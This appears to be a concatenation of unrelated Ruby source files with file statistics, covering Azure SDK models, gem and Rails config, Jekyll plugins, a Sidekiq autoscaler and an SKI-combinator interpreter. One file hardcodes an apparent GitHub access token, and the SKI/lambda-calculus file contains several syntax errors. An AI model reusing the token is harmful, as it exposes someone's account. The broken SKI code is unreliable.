name: 'Composite',
class_name: 'PrivateEndpoint',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
subnet: {
client_side_validation: true,
required: false,
serialized_name: 'properties.subnet',
type: {
name: 'Composite',
class_name: 'Subnet'
}
},
network_interfaces: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.networkInterfaces',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'NetworkInterfaceElementType',
type: {
name: 'Composite',
class_name: 'NetworkInterface'
}
}
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
private_link_service_connections: {
client_side_validation: true,
required: false,
serialized_name: 'properties.privateLinkServiceConnections',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'PrivateLinkServiceConnectionElementType',
type: {
name: 'Composite',
class_name: 'PrivateLinkServiceConnection'
}
}
}
},
manual_private_link_service_connections: {
client_side_validation: true,
required: false,
serialized_name: 'properties.manualPrivateLinkServiceConnections',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'PrivateLinkServiceConnectionElementType',
type: {
name: 'Composite',
class_name: 'PrivateLinkServiceConnection'
}
}
}
},
etag: {
client_side_validation: true,
required: false,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 33.389474 | 82 | 0.466425 |
d5ac3bd90372c75d776d845e345c3cc60bd60ac5 | 145 | RSpec.describe MatchboxRails do
it "has a version number" do
expect(MatchboxRails::VERSION).not_to be nil
end
# TODO: Write tests
end
| 18.125 | 48 | 0.731034 |
0331b037c26a0b14b55bd822add6f3f391b9b2b7 | 2,446 | require_relative 'lib/tuga/version'
Gem::Specification.new do |spec|
spec.name = 'tuga'
spec.version = Tuga::VERSION
spec.authors = ['Wilson Silva']
spec.email = ['[email protected]']
spec.summary = 'A Portuguese script programming language.'
spec.description = 'A Portuguese script programming language meant for educational purposes.'
spec.homepage = 'https://github.com/wilsonsilva/tuga'
spec.license = 'MIT'
spec.required_ruby_version = Gem::Requirement.new('~> 2.6.0')
spec.metadata['homepage_uri'] = spec.homepage
spec.metadata['source_code_uri'] = 'https://github.com/wilsonsilva/tuga'
spec.metadata['changelog_uri'] = 'https://github.com/wilsonsilva/tuga/blob/master/CHANGELOG.md'
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path(__dir__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'bin'
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
# These versions of the parsers and transpilers are compatible with Ruby 2.6. Recent versions are not.
spec.add_dependency 'ruby2ruby', '= 2.4.4'
spec.add_dependency 'ruby_parser', '= 3.14.2'
spec.add_development_dependency 'bundler', '~> 2.0'
spec.add_development_dependency 'bundler-audit', '~> 0.6'
spec.add_development_dependency 'guard', '~> 2.16'
spec.add_development_dependency 'guard-bundler', '~> 3.0'
spec.add_development_dependency 'guard-bundler-audit', '~> 0.1'
spec.add_development_dependency 'guard-rspec', '~> 4.7'
spec.add_development_dependency 'guard-rubocop', '~> 1.3'
spec.add_development_dependency 'overcommit', '~> 0.53'
spec.add_development_dependency 'pry', '~> 0.13'
spec.add_development_dependency 'rake', '~> 12.3'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_development_dependency 'rubocop', '~> 0.85'
spec.add_development_dependency 'rubocop-rspec', '~> 1.39'
spec.add_development_dependency 'simplecov', '~> 0.17.1'
spec.add_development_dependency 'simplecov-console', '~> 0.7'
spec.add_development_dependency 'yard', '~> 0.9'
spec.add_development_dependency 'yard-junk', '~> 0.0.7'
spec.add_development_dependency 'yardstick', '~> 0.9'
end
| 47.038462 | 104 | 0.699509 |
62967d85ca092d10405b8797cbd1deec388794b3 | 164 | # Load the rails application
require File.expand_path('../application', __FILE__)
# Initialize the rails application
Rails300ActiveRecord::Application.initialize!
| 27.333333 | 52 | 0.817073 |
79b1c52ddbd71cf803ffb3a8de453b04e9a1362c | 134 | RSpec.describe HatenablogPublisher do
it "has a version number" do
expect(HatenablogPublisher::VERSION).not_to be nil
end
end
| 22.333333 | 54 | 0.776119 |
d55d9a0033c7f592bba6f583c0f0b653bc832a3f | 168 | # frozen_string_literal: true
require 'octokit'
client = Octokit::Client.new(access_token: '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')
user = client.user
user.login
| 18.666667 | 86 | 0.809524 |
e811937d9cb9f6cd4186578b4608803f39845de6 | 1,815 | require 'transcode'
# Represents an encoding format and encoding options used to transcode an audio
# file from one format to another. This is an analog to the
# `ActiveStorage::Variation` class for images. An encoding can be coded into a
# URL.
class Transcode::Encoding
# @return [String] The format to transcode, as a file extension, such as
# "mp3".
attr_reader :format
# @return [Array<String>, Hash<String, String>] Either an array of FFMPEG
# transcode options (such as "-a:c 1") or a set of StreamIO options for
# FFMPEG (such as `{audio_channels: 1}`).
attr_reader :options
# @private
def self.wrap(descriptor, options=nil)
case descriptor
when self
descriptor
when Hash
decode descriptor[:key]
when String
new descriptor, options
else
raise ArgumentError, "Can't wrap #{descriptor.class}"
end
end
# @private
def self.decode(key)
new(*ActiveStorage.verifier.verify(key, purpose: :encoding))
end
# @private
def self.encode(format, options)
ActiveStorage.verifier.generate([format, options], purpose: :encoding)
end
# @private
def initialize(format, options=nil)
format.kind_of?(String) or raise ArgumentError, "expect string format, got #{format.class}"
@format = format
@options = options || {}
end
# @return [String] The coded key to use in URLs when describing this transcode
# operation.
def key
self.class.encode format, options
end
# @return [String] The file extension to use for transcoded files, including
# the leading period.
def extension
".#{format}"
end
# @return [Mime::Type] The MIME type instance associated with the transcoded
# file format.
def mime_type
Mime::Type.lookup_by_extension(format)
end
end
| 25.208333 | 95 | 0.684848 |
bb228ee8f86b4c107e2861430b87cbfa02345938 | 1,480 | require 'rouge'
module Jekyll
class CodeRefTag < Liquid::Tag
def initialize(tag_name, args, tokens)
all = args.strip.reverse.split(' ')
item = all.first.reverse
file = all[1..-1].join(" ").reverse
raise "You need to specify a name for the section to fetch" if all.size == 1
super
@file = file
@item = item
end
def add_code_tags(code, lang)
code = code.to_s
code = code.sub(/<pre>/, "<pre><code class=\"language-#{lang}\" data-lang=\"#{lang}\">")
code = code.sub(/<\/pre>/,"</code></pre>")
end
def strip_margin(text, spaces)
lines = text.strip.split("\n")
lines[0] << "\n" << lines[1..-1].map { |l| l[spaces..-1] }.join("\n")
end
def render(context)
return "Code ref file '#{@file}' does not exist." unless File.exist?(@file)
indented = (File.read(@file).match(/(?:\/\/\/|###)\s*code_ref\s*\:\s*#{@item}(.*?)(?:\/{3}|###)\s*end_code_ref/mi)||[])[1]
spaces = indented[1..-1].match(/(\s*)[^ ]/)[1].size
code = spaces == 0 ? indented : strip_margin(indented, spaces)
return "No code matched the key #{@item} in #{@file}" unless code
lexer = Rouge::Lexer.find(File.extname(@file).gsub(/^\./,''))
formatter = Rouge::Formatters::HTML.new({wrap: true})
highlighted = formatter.format(lexer.lex(code))
add_code_tags(highlighted, lexer)
end
end
end
Liquid::Template.register_tag('code_ref', Jekyll::CodeRefTag) | 32.173913 | 128 | 0.578378 |
08085cfba00a21cb5a1f01063001cd2379cfb095 | 659 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module RuShambo
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
end
end
| 32.95 | 82 | 0.764795 |
915dbe72331e6fd0921b018f8d98f3273d2fc1d9 | 913 | module Rhino
class Launcher
def initialize(port, bind, reuseaddr, backlog, config)
@port = port
@bind = bind
@reuseaddr = reuseaddr
@backlog = backlog
@config = config
end
def run
log_run
begin
socket.setsocket(:SOL_SOCKET, :SO_REUSEADDR, @reuseaddr)
socket.bind(addrinfo)
socket.listen(@backlog)
server = Server.new(application, [socket])
server.run
end
end
private
def log_run
Logger.log('Rhino')
Logger.log("#{@bind}:#{@port}")
end
def socket
Socket.new(:INET, :STREAM)
end
def application
eval(builder, nil, @config)
end
def addrinfo
Addrinfo.tcp(@bind, @port)
end
def raw
File.read(@config)
end
def builder
<<~BUILDER
Rack::Builder.new do
#{raw}
end
BUILDER
end
end
end
| 16.303571 | 64 | 0.556407 |
796cdfad88c46e6733f3508e3e05331d41d77643 | 41 | module JustInform
VERSION = "0.0.6"
end | 13.666667 | 19 | 0.707317 |
339ece780365cf3487dc0111162f71a6e965aae7 | 500 | require "foreman/version"
module Foreman
class AppDoesNotExist < Exception; end
# load contents of env_file into ENV
def self.load_env!(env_file = './.env')
require 'foreman/engine'
Foreman::Engine.load_env!(env_file)
end
def self.runner
File.expand_path("../../bin/foreman-runner", __FILE__)
end
def self.jruby?
defined?(RUBY_PLATFORM) and RUBY_PLATFORM == "java"
end
def self.windows?
defined?(RUBY_PLATFORM) and RUBY_PLATFORM =~ /(win|w)32$/
end
end
| 19.230769 | 61 | 0.69 |
6206a8692442810bdb10fe91347980f29142acc7 | 2,761 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2016_04_30_preview
module Models
#
# The List Image operation response.
#
class ImageListResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<Image>] The list of Images.
attr_accessor :value
# @return [String] The uri to fetch the next page of Images. Call
# ListNext() with this to fetch the next page of Images.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<Image>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ImageListResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ImageListResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ImageListResult',
type: {
name: 'Composite',
class_name: 'ImageListResult',
model_properties: {
value: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ImageElementType',
type: {
name: 'Composite',
class_name: 'Image'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.61 | 80 | 0.517204 |
f87cdeefe3aed56bc19add708cf9c686a3c4a323 | 1,090 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
require "json"
package = JSON.parse(File.read(File.join(__dir__, "..", "..", "package.json")))
version = package['version']
source = { :git => 'https://github.com/facebook/react-native.git' }
if version == '1000.0.0'
# This is an unpublished version, use the latest commit hash of the react-native repo, which we’re presumably in.
source[:commit] = `git rev-parse HEAD`.strip
else
source[:tag] = "v#{version}"
end
Pod::Spec.new do |s|
s.name = "React-jsinspector"
s.version = version
s.summary = "-" # TODO
s.homepage = "https://reactnative.dev/"
s.license = package["license"]
s.author = "Facebook, Inc. and its affiliates"
s.platforms = { :ios => "10.0" }
s.source = source
s.source_files = "*.{cpp,h}"
s.header_dir = 'jsinspector'
end
| 35.16129 | 115 | 0.584404 |
0346890830d328291c9526e17b2710fa312cb345 | 896 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'phttp/version'
Gem::Specification.new do |spec|
spec.name = "phttp"
spec.version = PHTTP::VERSION
spec.authors = ["Kim Burgestrand", "Jonas Nicklas"]
spec.email = ["[email protected]", "[email protected]"]
spec.summary = "Promising Typhoeus HTTP requests."
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "typhoeus"
spec.add_development_dependency "rspec", "~> 2.0"
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
end
| 35.84 | 74 | 0.651786 |
bb0948157431f46224092167c7fb36dee8ab314c | 5,663 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/update_checkers/java_script/yarn"
require_relative "../shared_examples_for_update_checkers"
RSpec.describe Dependabot::UpdateCheckers::JavaScript::Yarn do
it_behaves_like "an update checker"
before do
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 200, body: fixture("javascript", "npm_response.json"))
end
let(:checker) do
described_class.new(
dependency: dependency,
dependency_files: [],
github_access_token: "token"
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: "etag",
version: "1.0.0",
requirements: [{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }],
package_manager: "yarn"
)
end
describe "#needs_update?" do
subject { checker.needs_update? }
context "given an outdated dependency" do
it { is_expected.to be_truthy }
end
context "given an up-to-date dependency" do
let(:dependency) do
Dependabot::Dependency.new(
name: "etag",
version: "1.7.0",
requirements: [
{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }
],
package_manager: "yarn"
)
end
it { is_expected.to be_falsey }
end
context "for a scoped package name" do
before do
stub_request(:get, "https://registry.npmjs.org/@blep%2Fblep").
to_return(
status: 200,
body: fixture("javascript", "npm_response.json")
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: "@blep/blep",
version: "1.0.0",
requirements: [
{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }
],
package_manager: "yarn"
)
end
it { is_expected.to be_truthy }
end
end
describe "#latest_resolvable_version" do
subject { checker.latest_resolvable_version }
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
context "when the npm link resolves to a redirect" do
let(:redirect_url) { "https://registry.npmjs.org/eTag" }
before do
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 302, headers: { "Location" => redirect_url })
stub_request(:get, redirect_url).
to_return(
status: 200,
body: fixture("javascript", "npm_response.json")
)
end
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
end
end
describe "#latest_version" do
subject { checker.latest_version }
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
context "when the latest version is a prerelease" do
before do
body = fixture("javascript", "npm_response_prerelease.json")
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 200, body: body)
end
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
end
context "when the latest version is older than another, non-prerelease" do
before do
body = fixture("javascript", "npm_response_old_latest.json")
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 200, body: body)
end
it { is_expected.to eq(Gem::Version.new("1.6.0")) }
end
end
describe "#updated_requirements" do
subject { checker.updated_requirements.first }
let(:dependency) do
Dependabot::Dependency.new(
name: "etag",
version: "1.0.0",
requirements: [
{ file: "yarn.lock", requirement: original_requirement, groups: [] }
],
package_manager: "yarn"
)
end
let(:original_requirement) { "^1.0.0" }
let(:latest_resolvable_version) { nil }
before do
allow(checker).
to receive(:latest_resolvable_version).
and_return(latest_resolvable_version)
end
context "when there is no resolvable version" do
let(:latest_resolvable_version) { nil }
its([:requirement]) { is_expected.to eq(original_requirement) }
end
context "when there is a resolvable version" do
let(:latest_resolvable_version) { Gem::Version.new("1.5.0") }
context "and a full version was previously specified" do
let(:original_requirement) { "1.2.3" }
its([:requirement]) { is_expected.to eq("1.5.0") }
end
context "and a partial version was previously specified" do
let(:original_requirement) { "0.1" }
its([:requirement]) { is_expected.to eq("1.5") }
end
context "and the new version has fewer digits than the old one§" do
let(:original_requirement) { "1.1.0.1" }
its([:requirement]) { is_expected.to eq("1.5.0") }
end
context "and a caret was previously specified" do
let(:original_requirement) { "^1.2.3" }
its([:requirement]) { is_expected.to eq("^1.5.0") }
end
context "and a pre-release was previously specified" do
let(:original_requirement) { "^1.2.3-rc1" }
its([:requirement]) { is_expected.to eq("^1.5.0") }
end
context "and an x.x was previously specified" do
let(:original_requirement) { "^0.x.x-rc1" }
its([:requirement]) { is_expected.to eq("^1.x.x") }
end
context "and an x.x was previously specified with four places" do
let(:original_requirement) { "^0.x.x.rc1" }
its([:requirement]) { is_expected.to eq("^1.x.x") }
end
end
end
end
| 29.649215 | 79 | 0.607275 |
e9a27790f146f5b7f735473b04811c0e3d836c90 | 579 | cask 'iglance' do
version '2.0.3'
sha256 '4f5c416d99c35884e28ad7b418c28b6f8c1cd75faa33895ae5f85d3ad04b0735'
url "https://github.com/iglance/iglance/releases/download/v#{version}/iGlance_v#{version}.zip"
appcast 'https://github.com/iglance/iglance/releases.atom'
name 'iGlance'
homepage 'https://github.com/iglance/iGlance'
auto_updates true
depends_on macos: '>= :sierra'
app 'iGlance.app'
zap trash: [
'~/Library/Caches/io.github.iglance.iGlance',
'~/Library/Preferences/io.github.iglance.iGlance.plist',
]
end
| 28.95 | 96 | 0.694301 |
edd387e7210e3dd9f6ea117d47e6131e66c08afa | 111 | class Comment < ActiveRecord::Base
belongs_to :post
belongs_to :user
validates :body, presence: true
end
| 18.5 | 34 | 0.756757 |
d5f9a04bb00c48e5080ad3634fa6674f4edeb24f | 1,603 | # frozen_string_literal: true
#
# Puma can serve each request in a thread from an internal thread pool.
# The `threads` method setting takes two numbers: a minimum and maximum.
# Any libraries that use thread pools should be configured to match
# the maximum value specified for Puma. Default is set to 5 threads for minimum
# and maximum; this matches the default thread size of Active Record.
#
max_threads_count = ENV.fetch('RAILS_MAX_THREADS', 5)
min_threads_count = ENV.fetch('RAILS_MIN_THREADS', max_threads_count)
threads min_threads_count, max_threads_count
# Specifies the `port` that Puma will listen on to receive requests; default is 3000.
#
port ENV.fetch('PORT', 3000)
# Specifies the `environment` that Puma will run in.
#
environment ENV.fetch('RAILS_ENV', 'development')
# Specifies the `pidfile` that Puma will use.
pidfile ENV.fetch('PIDFILE', 'tmp/pids/server.pid')
# Specifies the number of `workers` to boot in clustered mode.
# Workers are forked web server processes. If using threads and workers together
# the concurrency of the application would be max `threads` * `workers`.
# Workers do not work on JRuby or Windows (both of which do not support
# processes).
#
# workers ENV.fetch("WEB_CONCURRENCY") { 2 }
# Use the `preload_app!` method when specifying a `workers` number.
# This directive tells Puma to first boot the application and load code
# before forking the application. This takes advantage of Copy On Write
# process behavior so workers use less memory.
#
# preload_app!
# Allow puma to be restarted by `rails restart` command.
plugin :tmp_restart
| 38.166667 | 85 | 0.766064 |
284e7441f109118c8fa3c98800e3750ad637dc9c | 496 | class JokeGenerator::Category
attr_accessor :title, :link
attr_reader :jokes
@@all = []
def self.new_from_categories_page (category)
self.new(
category.attribute("title").value,
category.attribute("href").value
)
end
def initialize (title = nil, link = nil)
@title = title
@link = link
@@all << self
@jokes = []
end
def add_joke (joke)
@jokes << joke
end
def self.find(id)
self.all[id - 1]
end
def self.all
@@all
end
end
| 14.171429 | 46 | 0.608871 |
6a25acc3b671f7201a622cc95b4e0cfef50948d8 | 746 | cask 'font-firacode-nerd-font-mono' do
version '1.1.0'
sha256 '551309fad856238876d051bfb2d81d9c85707f797de562529cb5aa2505e2ac7d'
url "https://github.com/ryanoasis/nerd-fonts/releases/download/v#{version}/FiraCode.zip"
appcast 'https://github.com/ryanoasis/nerd-fonts/releases.atom',
checkpoint: '109f18cfd453156e38ffac165683bcfc2745e0c8dc07bd379a7f9ea19d0cbe41'
name 'FuraCode Nerd Font (FiraCode)'
homepage 'https://github.com/ryanoasis/nerd-fonts'
font 'Fura Code Bold Nerd Font Complete Mono.otf'
font 'Fura Code Medium Nerd Font Complete Mono.otf'
font 'Fura Code Retina Nerd Font Complete Mono.otf'
font 'Fura Code Regular Nerd Font Complete Mono.otf'
font 'Fura Code Light Nerd Font Complete Mono.otf'
end
| 43.882353 | 90 | 0.776139 |
ab425b0adf3c3375e8c36bcf7aa65bf9926a2002 | 2,744 | # frozen_string_literal: true
module SidekiqAutoscale
module Strategies
class DelayScaling < BaseScaling
SAMPLE_RANGE = 1.minute
DELAY_LOG_KEY = "sidekiq_autoscaling:delay_log"
DELAY_AVERAGE_CACHE_KEY = "sidekiq_autoscaling:delay_average"
LOG_TAG = "[SIDEKIQ_SCALE][DELAY_SCALING]"
def log_job(job)
timestamp = Time.current.to_f
# Gotta do it this way so that each entry is guaranteed to be unique
zset_payload = {delay: (timestamp - job["enqueued_at"]), jid: job["jid"]}.to_json
# Redis zadd runs in O(log(N)) time, so this should be threaded to avoid blocking
# Also, it should be connection-pooled, but I can't remember if we're using
# redis connection pooling anywhere
Thread.new {
SidekiqAutoscale.redis_client.zadd(DELAY_LOG_KEY, timestamp, zset_payload)
}
end
def workload_change_needed?(_job)
workload_too_high? || workload_too_low?
end
def scaling_direction(_job)
return -1 if workload_too_low?
return 1 if workload_too_high?
0
end
private
def delay_average
# Only calculate this once every minute - this operation isn't very efficient
# We may want to offload it to another Redis DB number, which will be just delay keys
SidekiqAutoscale.cache.fetch(DELAY_AVERAGE_CACHE_KEY, expires_in: SAMPLE_RANGE) do
# Delete old scores that won't be included in the metric
SidekiqAutoscale.redis_client.zremrangebyscore(DELAY_LOG_KEY, 0, SAMPLE_RANGE.ago.to_f)
vals = SidekiqAutoscale.redis_client.zrange(DELAY_LOG_KEY, 0, -1).map {|i| JSON.parse(i)["delay"].to_f }
return 0 if vals.empty?
vals.instance_eval { reduce(:+) / size.to_f }
rescue JSON::ParserError => e
SidekiqAutoscale.logger.error(e)
SidekiqAutoscale.logger.error(e.backtrace.join("\n"))
return 0
end
end
def workload_too_high?
too_high = delay_average > SidekiqAutoscale.scale_up_threshold
SidekiqAutoscale.logger.debug("#{LOG_TAG} Workload too high") if too_high
SidekiqAutoscale.logger.debug("#{LOG_TAG} Current average delay: #{delay_average}, max allowed: #{SidekiqAutoscale.scale_up_threshold}")
too_high
end
def workload_too_low?
too_low = delay_average < SidekiqAutoscale.scale_down_threshold
SidekiqAutoscale.logger.debug("#{LOG_TAG} Workload too low") if too_low
SidekiqAutoscale.logger.debug("#{LOG_TAG} Current average delay: #{delay_average}, min allowed: #{SidekiqAutoscale.scale_down_threshold}")
too_low
end
def delay_array; end
end
end
end
| 37.589041 | 146 | 0.679665 |
6ab79ea6601f28cfba1e260008417ab685fb2e75 | 1,092 | class Dbhash < Formula
desc "Computes the SHA1 hash of schema and content of a SQLite database"
homepage "https://www.sqlite.org/dbhash.html"
url "https://sqlite.org/2019/sqlite-src-3300100.zip"
version "3.30.1"
sha256 "4690370737189149c9e8344414aa371f89a70e3744ba317cef1a49fb0ee81ce1"
bottle do
cellar :any_skip_relocation
sha256 "9ea365cbc64a6623313e4d6701ac5cfe12d14b76be8b6fba72afdb47129327d6" => :catalina
sha256 "84322ef8c2737104776358d3ddc6f253ce4e4d9bf464d4d2da1fa8c56bba7d2f" => :mojave
sha256 "953a02effe120859def6682480aa659fd137163ff1334d247c2ebd20472407c4" => :high_sierra
end
def install
system "./configure", "--disable-debug", "--prefix=#{prefix}"
system "make", "dbhash"
bin.install "dbhash"
end
test do
dbpath = testpath/"test.sqlite"
sqlpath = testpath/"test.sql"
sqlpath.write "create table test (name text);"
system "/usr/bin/sqlite3 #{dbpath} < #{sqlpath}"
assert_equal "b6113e0ce62c5f5ca5c9f229393345ce812b7309",
shell_output("#{bin}/dbhash #{dbpath}").strip.split.first
end
end
| 36.4 | 93 | 0.738095 |
bf4382a6d8a0e9279ef7fba8fa082561dad51d8f | 663 | #
# Cookbook Name:: apache2
# Recipe:: mod_expires
#
# Copyright 2008-2013, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
apache_module 'expires'
| 31.571429 | 74 | 0.75264 |
1178e9348e96f110bcf6828eec639beee8c02a90 | 72 |
begin
quotient = 1 / 0
rescue
puts 'ぜろで助産師用とした'
end
p quotient
| 9 | 21 | 0.652778 |
877aa191a795e5eb068aeaf9b9d8a6fdae423180 | 2,162 | class SKISymbol < Struct.new(:name)
def to_s
name.to_s
end
def inspect
to_s
end
def combinator
self
end
def arguments
[]
end
def callable?(*arguments)
false
end
def reduciable?
false
end
def as_a_function_of(name)
if self.name == name
I
else
SKICall.new(K, self)
end
end
end
class SKICall < Struct.new(:left, :right)
def to_S
"#{left}[#{right}]"
end
def inspect
to_s
end
def combinator
left.combinator
end
def arguments
left.arguments + [right]
end
def reduciable?
left.reduciable? || right.reduciable? || combinator.callable?(*arguments)
end
def reduce
if left.reduciable?
SKICall.new(left.reduce, right)
elsif right.reduciable?
SKICall.new(left. right.reduce)
else
combinator.call(*arguments)
end
end
def as_a_function_of(name)
left_function = left.as_a_function_of(name)
right_function = right.as_a_function_of(name)
SKICall.new(SKICall.new(S, left_function), right.function)
end
end
class SKICombinator < SKISymbol
def callable?(*arguments)
arguments.length == method(:call).arity
end
def as_a_function_of(name)
SKICall.new(K,self)
end
end
S,K,I = [:S,:K,:I].map{ |name| SKICombinator.new(name) }
def S.call(a,b,c)
SKICall.new(SKICall.new(S,K), SKICall.new(I,x))
end
def K.call(a.b)
a
end
def I.call(a)
a
end
#def S.callable?(*arguments)
# arguments.length == 3
#end
#
#def K.callable?(*arguments)
# arguments.length == 2
#end
#
#def I.callable?(*arguments)
# arguments.length == 1
#end
class LCVariable < Struct.new(:name)
def to_ski
SKISymbol.new(name)
end
end
class LCCall < Struct.new(:left, :right)
def to_ski
SKICall.new(left.to_ski, right.to_ski)
end
end
def LCFunction < Struct.new(:parameter, :body)
def to_ski
body.to_ski.as_a_function_of(parameter)
end
end
| 14.707483 | 81 | 0.584644 |
f806f97d5b89ae7c929450d8664496f77baa8dc5 | 8,553 | # frozen_string_literal: true
require 'verbal_expressions'
require 'filesize'
require 'cgi'
module Jekyll
module Algolia
# Catch API errors and display messages
module ErrorHandler
include Jekyll::Algolia
# Public: Stop the execution of the plugin and display if possible
# a human-readable error message
#
# error - The caught error
# context - A hash of values that will be passed from where the error
# happened to the display
def self.stop(error, context = {})
Logger.verbose("E:[jekyll-algolia] Raw error: #{error}")
Logger.verbose("E:[jekyll-algolia] Context: #{context}")
identified_error = identify(error, context)
if identified_error == false
Logger.log('E:[jekyll-algolia] Error:')
Logger.log("E:#{error}")
else
Logger.known_message(
identified_error[:name],
identified_error[:details]
)
end
exit 1
end
# Public: Will identify the error and return its internal name
#
# error - The caught error
# context - A hash of additional information that can be passed from the
# code intercepting the user
#
# It will parse in order all potential known issues until it finds one
# that matches. Returns false if no match, or a hash of :name and :details
# further identifying the issue.
def self.identify(error, context = {})
known_errors = %w[
unknown_application_id
invalid_credentials_for_tmp_index
invalid_credentials
record_too_big
unknown_settings
invalid_index_name
]
# Checking the errors against our known list
known_errors.each do |potential_error|
error_check = send("#{potential_error}?", error, context)
next if error_check == false
return {
name: potential_error,
details: error_check
}
end
false
end
# Public: Parses an Algolia error message into a hash of its content
#
# message - The raw message as returned by the API
#
# Returns a hash of all parts of the message, to be more easily consumed
# by our error matchers
def self.error_hash(message)
message = message.delete("\n")
# Ex: Cannot PUT to https://appid.algolia.net/1/indexes/index_name/settings:
# {"message":"Invalid Application-ID or API key","status":403} (403)
regex = VerEx.new do
find 'Cannot '
capture('verb') { word }
find ' to '
capture('scheme') { word }
find '://'
capture('application_id') { word }
anything_but '/'
find '/'
capture('api_version') { digit }
find '/'
capture('api_section') { word }
find '/'
capture('index_name') do
anything_but('/')
end
find '/'
capture do
capture('api_action') { word }
maybe '?'
capture('query_parameters') do
anything_but(':')
end
end
find ': '
capture('json') do
find '{'
anything_but('}')
find '}'
end
find ' ('
capture('http_error') { word }
find ')'
end
matches = regex.match(message)
return false unless matches
# Convert matches to a hash
hash = {}
matches.names.each do |name|
hash[name] = matches[name]
end
hash['api_version'] = hash['api_version'].to_i
hash['http_error'] = hash['http_error'].to_i
# Merging the JSON key directly in the answer
hash = hash.merge(JSON.parse(hash['json']))
hash.delete('json')
# Merging the query parameters in the answer
CGI.parse(hash['query_parameters']).each do |key, values|
hash[key] = values[0]
end
hash.delete('query_parameters')
hash
end
# Public: Check if the application id is available
#
# _context - Not used
#
# If the call to the cluster fails, chances are that the application ID
# is invalid. As we cannot actually contact the server, the error is raw
# and does not follow our error spec
def self.unknown_application_id?(error, _context = {})
message = error.message
return false if message !~ /^Cannot reach any host/
matches = /.*\((.*)\.algolia.net.*/.match(message)
# The API will browse on APP_ID-dsn, but push/delete on APP_ID only
# We need to catch both potential errors
app_id = matches[1].gsub(/-dsn$/, '')
{ 'application_id' => app_id }
end
# Public: Check if credentials specifically can't access the _tmp index
#
# _context - Not used
#
